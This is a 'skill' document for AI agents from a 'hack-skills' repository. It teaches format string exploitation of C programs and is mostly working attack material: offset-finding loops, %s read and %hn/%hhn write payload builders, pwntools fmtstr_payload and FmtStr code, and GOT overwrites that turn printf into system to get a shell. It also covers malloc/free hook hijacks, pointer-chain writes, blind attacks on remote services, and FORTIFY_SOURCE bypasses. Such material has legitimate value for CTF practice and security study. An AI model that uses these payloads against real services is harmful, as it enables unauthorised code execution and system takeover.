format-string-exploitation


INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill format-string-exploitation
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md


printf(user_input);          // VULNERABLE: user controls format string

fprintf(fp, user_input);     // VULNERABLE

sprintf(buf, user_input);    // VULNERABLE

snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

Input: AAAAAAAA%p%p%p%p%p%p%p%p

If the output shows stack values (hex addresses), the format string bug is confirmed.

Look for 0x4141414141414141 in the output (0x41414141 on 32-bit) to find your input offset.

2. READING MEMORY

Stack Leak (%p)

| Format | Action | Use |
| --- | --- | --- |
| %p | Print next stack value as pointer | Sequential stack dump |
| %N$p | Print N-th parameter as pointer | Direct positional access |
| %N$lx | Same as %p but explicit hex (64-bit) | Portable |
| %N$s | Dereference N-th parameter as string pointer | Read memory at pointer value |

Finding Your Input Offset

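# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141...
# The sixth value echoes the input, so offset = 6 (example)

# Or automated (io is a pwntools tube; the target must process one format
# string per input line for this loop to work):
for i in range(1, 30):
    io.sendline(f'AAAAAAAA%{i}$p'.encode())      # tubes expect bytes
    if b'4141414141414141' in io.recvline():     # with AAAA on 32-bit, match b'41414141'
        print(f'Offset = {i}')
        break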
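A single dot-separated dump can also be parsed offline instead of probing one offset per request. The following is a minimal sketch in plain Python; the function name `find_input_offset` and the sample response are illustrative assumptions, not part of any tool.

```python
def find_input_offset(dump: bytes, marker: bytes = b"AAAAAAAA", sep: bytes = b"."):
    """Return the 1-based offset whose leaked word equals the marker, or None."""
    # %p prints the word as a little-endian integer, so the marker bytes
    # appear in reverse order in the hex text.
    expected = b"0x" + marker[::-1].hex().encode()
    fields = dump.strip().split(sep)
    # fields[0] is the echoed marker itself; fields[1:] are the %p results.
    for offset, field in enumerate(fields[1:], start=1):
        if field == expected:
            return offset
    return None


# Hypothetical response to b"AAAAAAAA.%p.%p.%p.%p.%p.%p"
sample = b"AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0x1.0x4141414141414141"
print(find_input_offset(sample))  # → 6
```

The exact-match comparison only works when the marker fills a whole stack slot, which is why an 8-byte marker is used for 64-bit targets.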

Leaking Specific Values

| Target | Method | Stack Position |
| --- | --- | --- |
| Canary | %N$p where N = canary offset from format string | Typically input offset + buf_size/8 plus a few slots; the low byte is 0x00 |
| Saved RBP | %N$p (slot just before the return address) | Leaks stack address → stack base |
| Return address | %N$p | Leaks .text address (PIE base = leak - offset of the return site; the result should be page-aligned) |
| Libc address | %N$p where N points to __libc_start_main+XX return on stack | libc base = leak - offset |
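The base calculations in the table reduce to one subtraction plus a sanity check. Here is a small sketch, assuming the leak arrives as `%p` text; the helper names and the numeric offsets are made up for illustration and must be replaced with values from the actual binary or libc.

```python
PAGE_MASK = 0xFFF


def parse_pointer(text: bytes) -> int:
    """Convert one %p field (b'0x7f...' or b'(nil)') to an integer."""
    text = text.strip()
    return 0 if text == b"(nil)" else int(text.decode(), 16)


def base_from_leak(leak: int, known_offset: int) -> int:
    """Subtract the known offset and verify the result is page-aligned."""
    base = leak - known_offset
    if base & PAGE_MASK:
        # A misaligned base almost always means a wrong offset or wrong libc.
        raise ValueError(f"base {base:#x} is not page-aligned")
    return base


# Hypothetical leak and offset, for illustration only
leak = parse_pointer(b"0x7f1234a29d90")
print(hex(base_from_leak(leak, 0x29D90)))  # → 0x7f1234a00000
```

Raising on a misaligned result catches a wrong offset early, before it silently corrupts every later address calculation.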

Reading Arbitrary Address (%s)

# 32-bit: place address at start of format string (it must contain no null bytes)
payload = p32(target_addr) + b'%N$s'  # N = offset where target_addr appears on stack

# 64-bit: address contains null bytes → place AFTER format specifiers
# Example with input at offset 6: the 8-byte specifier block fills slot 6,
# so the address lands in slot 7
payload = b'%7$sAAAA' + p64(target_addr)
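The slot arithmetic for the 64-bit layout is easy to get wrong by one, so it helps to compute it. The sketch below uses only the standard library; `build_read_payload`, `leak_to_int`, and the fixed 16-byte specifier region are assumptions chosen for illustration.

```python
import struct


def build_read_payload(input_offset: int, addr: int, fmt_len: int = 16) -> bytes:
    """64-bit %s read: specifiers first, padded to fmt_len, then the address."""
    if fmt_len % 8:
        raise ValueError("fmt_len must be a multiple of 8")
    # The address lands fmt_len // 8 slots after the start of the input.
    addr_slot = input_offset + fmt_len // 8
    spec = b"%%%d$s" % addr_slot
    if len(spec) > fmt_len:
        raise ValueError("specifier does not fit in fmt_len")
    return spec.ljust(fmt_len, b"A") + struct.pack("<Q", addr)


def leak_to_int(leaked: bytes) -> int:
    """Interpret up to 8 leaked bytes as a little-endian pointer."""
    return struct.unpack("<Q", leaked[:8].ljust(8, b"\x00"))[0]


payload = build_read_payload(6, 0x601018)
print(payload[:16])  # → b'%8$sAAAAAAAAAAAA'
```

`%s` stops at the first null byte, so a leaked pointer usually comes back as 6 bytes; `leak_to_int` pads it back to 8 before unpacking.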

3. WRITING MEMORY (%n)

Write Specifiers

| Specifier | Bytes Written | Value Written |
| --- | --- | --- |
| %n | 4 bytes (int) | Characters printed so far |
| %hn | 2 bytes (short) | Characters printed so far (mod 0x10000) |
| %hhn | 1 byte (char) | Characters printed so far (mod 0x100) |
| %ln | 8 bytes (long on 64-bit) | Characters printed so far |
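The modular behaviour in the table is what makes it possible to write a value smaller than the number of characters already printed. A short sketch of the arithmetic follows; the helper names are illustrative, and the widths assume a 64-bit target.

```python
# Bytes stored by each specifier (long is 8 bytes on LP64 targets)
WIDTHS = {"%hhn": 1, "%hn": 2, "%n": 4, "%ln": 8}


def stored_value(printed: int, spec: str) -> int:
    """Value that lands in memory when `printed` characters were output."""
    return printed & ((1 << (8 * WIDTHS[spec])) - 1)


def padding_needed(printed: int, wanted: int, spec: str) -> int:
    """Extra characters to print so the next write stores `wanted`."""
    return (wanted - printed) % (1 << (8 * WIDTHS[spec]))


print(hex(stored_value(0x12345, "%hn")))            # → 0x2345
print(hex(padding_needed(0x2345, 0x1000, "%hn")))   # → 0xecbb
```

In the second call the counter wraps: 0x2345 + 0xecbb = 0x11000, which `%hn` truncates to 0x1000.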

Arbitrary Write Technique

Goal: Write value V to address A.

32-bit (address on stack directly):

# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload  = p32(target_addr)       # for low 2 bytes
payload += p32(target_addr + 2)   # for high 2 bytes

# Calculate padding for each %hn write; the 8 address bytes are already printed.
# Padding is taken mod 0x10000 so it never goes negative.
# If a padding works out to 0, drop that %c: %0c still prints one character.
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{(low - 8) & 0xffff}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
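As a worked version of the 32-bit calculation, the sketch below sorts the two halfwords so the smaller one is written first, which keeps the padding short, and skips zero-length padding. It uses only the standard library; the function name, target address, value, and offset are hypothetical.

```python
import struct


def build_hn_payload_32(target_addr: int, value: int, offset: int) -> bytes:
    """Two %hn writes with the addresses at the start of the payload."""
    # (halfword to store, index of the address it goes to)
    halves = [(value & 0xFFFF, 0), ((value >> 16) & 0xFFFF, 1)]
    payload = struct.pack("<II", target_addr, target_addr + 2)
    printed = len(payload)  # the 8 address bytes are printed first
    for half, idx in sorted(halves):
        pad = (half - printed) & 0xFFFF
        if pad:  # %0c would still print one character, so omit it
            payload += b"%%%dc" % pad
        payload += b"%%%d$hn" % (offset + idx)
        printed += pad
    return payload


# Hypothetical target, value, and input offset
print(build_hn_payload_32(0x0804A010, 0x0804860B, 4))
```

The sketch assumes neither address contains a null byte or a `%` byte; either would break the payload before the writes run.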

64-bit (address AFTER format string):

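# Addresses contain null bytes (0x00007fXXXXXXXXXX) which terminate the string
# Solution: place addresses AFTER the format specifiers
# Step 1: format string portion (no null bytes)
# X, Y = padding counts; N, M = offsets of the appended addresses
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to a multiple of 8 bytes so each address fills a whole stack slot
# (after padding, N = input offset + len(fmt) // 8 and M = N + 1)
align = (len(fmt) + 7) // 8 * 8
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)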
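The placeholders in the 64-bit layout depend on each other: the address slots depend on the length of the specifier region, which depends on the digits in the slots. One way around this is to reserve a fixed-size region up front. The following sketch does that with three `%hn` writes; the function name, the 64-byte region, and all numeric inputs are assumptions for illustration.

```python
import struct


def build_hn_payload_64(target_addr: int, value: int, offset: int,
                        n_writes: int = 3, fmt_len: int = 64) -> bytes:
    """%hn writes with a fixed-size specifier region followed by the addresses."""
    if fmt_len % 8:
        raise ValueError("fmt_len must be a multiple of 8")
    first_addr_slot = offset + fmt_len // 8
    parts = [((value >> (16 * i)) & 0xFFFF, i) for i in range(n_writes)]
    fmt, printed = b"", 0
    for half, i in sorted(parts):  # ascending order keeps padding short
        pad = (half - printed) & 0xFFFF
        if pad:
            fmt += b"%%%dc" % pad
        fmt += b"%%%d$hn" % (first_addr_slot + i)
        printed += pad
    if len(fmt) > fmt_len:
        raise ValueError("specifiers do not fit; increase fmt_len")
    addrs = b"".join(struct.pack("<Q", target_addr + 2 * i) for i in range(n_writes))
    return fmt.ljust(fmt_len, b"A") + addrs


# Hypothetical GOT slot, value, and input offset
payload = build_hn_payload_64(0x404018, 0x7FFFF7E12345, 6)
print(payload[:38])  # → b'%9029c%14$hn%23738c%16$hn%30690c%15$hn'
```

The filler bytes sit after the last `%hn`, so printing them does not affect any stored value.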

Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):

writes = {}

for i in range(6):

    byte_val = (value >> (i * 8)) & 0xff

    writes[target_addr + i] = byte_val

# pwntools handles the math:

from pwn import fmtstr_payload

payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

4. PWNTOOLS fmtstr_payload()

from pwn import *

# Overwrite GOT entry with target address

payload = fmtstr_payload(

    offset,                    # stack offset where input appears

    {elf.got['printf']: libc.symbols['system']},  # {addr: value}

    numbwritten=0,             # bytes already output before our input

    write_size='short'         # 'byte', 'short', or 'int'

)

# For 64-bit, set context.arch = 'amd64' (or context.binary = elf) first;

# fmtstr_payload then places the addresses after the format string automatically

FmtStr Class (Interactive Exploitation)

from pwn import *

def send_payload(payload):

    io.sendline(payload)

    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)

# fmt.offset is auto-detected

fmt.write(elf.got['printf'], libc.symbols['system'])

fmt.execute_writes()

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

| Overwrite | With | Trigger |
| --- | --- | --- |
| printf@GOT | system | Next printf(user_input) → system(user_input); send /bin/sh |
| strlen@GOT | system | If strlen(user_input) called |
| puts@GOT | system | If puts(user_input) called |
| atoi@GOT | system | If atoi(user_input) called (send sh as "number") |
| __stack_chk_fail@GOT | Controlled addr | A failed canary check jumps to the controlled address instead of aborting |
| exit@GOT | main | Create infinite loop for multi-shot exploit |

Hook Targets (glibc < 2.34)

| Target | Overwrite With | Trigger |
| --- | --- | --- |
| __malloc_hook | one_gadget addr | Any printf with a large field width (e.g. %100000c) → internal malloc |
| __free_hook | system | Trigger free("/bin/sh") |

6. STACK POINTER CHAIN EXPLOITATION

When the format string is not on the stack (e.g., stored in a heap buffer referenced by a stack pointer), target addresses cannot be placed in the payload. Use pointer chains already on the stack to achieve arbitrary write.

Two-Stage Write

Stack:

  [offset A] → ptr_X (stack value that points to the stack slot at offset B)

  [offset B] → ptr_Y (value stored in the slot that ptr_X points to)

Stage 1: Use %A$hn to write through ptr_X → overwrites the low 2 bytes of ptr_Y, so ptr_Y now points to target_addr

Stage 2: Use %B$n to write through the modified ptr_Y → writes to target_addr

A single %hn changes only the low 16 bits of ptr_Y, so target_addr must share its upper bytes with the original value (typically another stack address, such as a saved return address). Other targets need additional partial writes.

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

Finding Pointer Chains

# Leak stack with %p, look for:

# 1. A value at offset N that is the address of the stack slot at offset M

# 2. A pointer-sized value at offset M that can be retargeted

# Write through offset N (using %N$hn) to change where the value at offset M points

# Then write through offset M (using %M$hn) to hit the target
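The search for usable chains can be automated once the address of one stack slot is known. The sketch below is one way to do it, assuming the leaked words are already parsed into integers and that the address of the first stack-backed slot (offset 6 on x86-64) has been derived from a leaked stack pointer; the function name and sample values are hypothetical.

```python
def find_pointer_chains(values, first_stack_slot_addr, first_stack_offset=6, word=8):
    """Return (N, M) pairs where the value at offset N is the address of slot M.

    values[i] is the word leaked by %{i+1}$p.
    """
    chains = []
    last_offset = len(values)
    for idx, value in enumerate(values):
        n = idx + 1
        delta = value - first_stack_slot_addr
        if delta < 0 or delta % word:
            continue  # not an aligned address at or above the first stack slot
        m = first_stack_offset + delta // word
        if m <= last_offset and m != n:
            chains.append((n, m))
    return chains


# Hypothetical dump: slot 6 points at slot 8, and slot 8 points at slot 10
base = 0x7FFD00001000          # assumed address of the slot read by %6$p
leaked = [0] * 12
leaked[5] = base + 2 * 8       # offset 6 holds the address of offset 8
leaked[7] = base + 4 * 8       # offset 8 holds the address of offset 10
print(find_pointer_chains(leaked, base))  # → [(6, 8), (8, 10)]
```

Each returned pair is a candidate for the two-stage write: `%N$hn` retargets the value held at offset M, and `%M$hn` then writes through it.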

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

| Step | Action | Purpose |
| --- | --- | --- |
| 1 | Send %p × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send AAAA%N$p for N=1..50, find 0x41414141 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via %N$s with GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | %n to rewrite GOT entry with system address |
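Step 2 of the methodology is mostly pattern matching on the leaked values. The sketch below encodes the prefixes named in the table, plus two ranges commonly seen on x86-64 Linux (0x55/0x56 for PIE code and 0x400000 for non-PIE code). The ranges are heuristics, not guarantees, and the function name is an assumption.

```python
def classify_leak(value: int) -> str:
    """Heuristically label a leaked 64-bit value by its address range."""
    if value == 0:
        return "null"
    if 0x7FF000000000 <= value <= 0x7FFFFFFFFFFF:
        return "stack"
    if 0x7F0000000000 <= value < 0x7FF000000000:
        return "libc/mmap"
    if 0x550000000000 <= value < 0x570000000000:
        return "pie-code/heap"
    if 0x400000 <= value < 0x1000000:
        return "non-pie-code"
    return "other"


# Hypothetical dump values
for leak in (0x7FFD12340000, 0x7F1234567890, 0x55D4A1B2C3D4, 0x401136, 0x1):
    print(hex(leak), classify_leak(leak))
```

PIE code and the heap share the same high bytes, so a value in that range needs a second look (for example, whether it repeats across runs relative to other leaks) before it is used as a base.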

8. FORTIFY_SOURCE BYPASS

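FORTIFY_SOURCE (gcc -O2 -D_FORTIFY_SOURCE=2) replaces printf with __printf_chk, which adds two checks. %n aborts when the format string is in writable memory (stack, heap, .data/.bss). Positional arguments (%N$...) abort unless every earlier position is also referenced, so an isolated %N$n or %N$p is blocked.

Bypass Techniques

| Method | Detail |
| --- | --- |
| Use %hn sequentially (no positional) | Print exact byte count, %hn, adjust, %hn. Fragile, and works only where the writable-memory %n check does not fire |
| Stack-based exploit | If format string is on stack, use non-positional specifiers with stack position control (sequential %p leaks still work) |
| Heap overflow instead | FORTIFY does not protect the heap, so combine with a heap bug |
| Return-to-printf | ROP to call unfortified printf (if available in binary or libc) |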

9. 64-BIT CONSIDERATIONS

| Challenge | Solution |
| --- | --- |
| Addresses contain \x00 (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × %hn (2 bytes each) or 6 × %hhn |
| Larger stack offset range | Offsets 1-5 read registers (rsi, rdx, rcx, r8, r9); stack slots start at offset 6, so input is at offset 6 or higher |
| 48-bit address space | Only bottom 48 bits of 64-bit used |

Layout Template (64-bit)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...

 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

Format string vulnerability confirmed (printf(user_input))

├── FORTIFY_SOURCE enabled? (__printf_chk)

│   ├── YES → positional %n blocked

│   │   ├── Sequential %n possible? → non-positional write

│   │   └── Combine with another primitive (heap, ROP)

│   └── NO → full positional %n available

├── What do you need first?

│   ├── Leak canary → %N$p at canary stack offset

│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset

│   ├── Leak libc base → %N$p at __libc_start_main return on stack

│   ├── Leak heap base → %N$p at heap pointer on stack

│   └── Leak specific address → %N$s with target address on stack

├── Architecture?

│   ├── 32-bit → addresses at start of format string

│   └── 64-bit → addresses after format string (null byte issue)

├── Write target?

│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)

│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)

│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list

│   └── Stack return address → direct overwrite (if ASLR bypassed)

├── Single-shot or multi-shot?

│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains

│   └── One-shot → fmtstr_payload() with all writes in single payload

└── Input not on stack? (heap buffer)

    └── Use stack pointer chains for indirect writes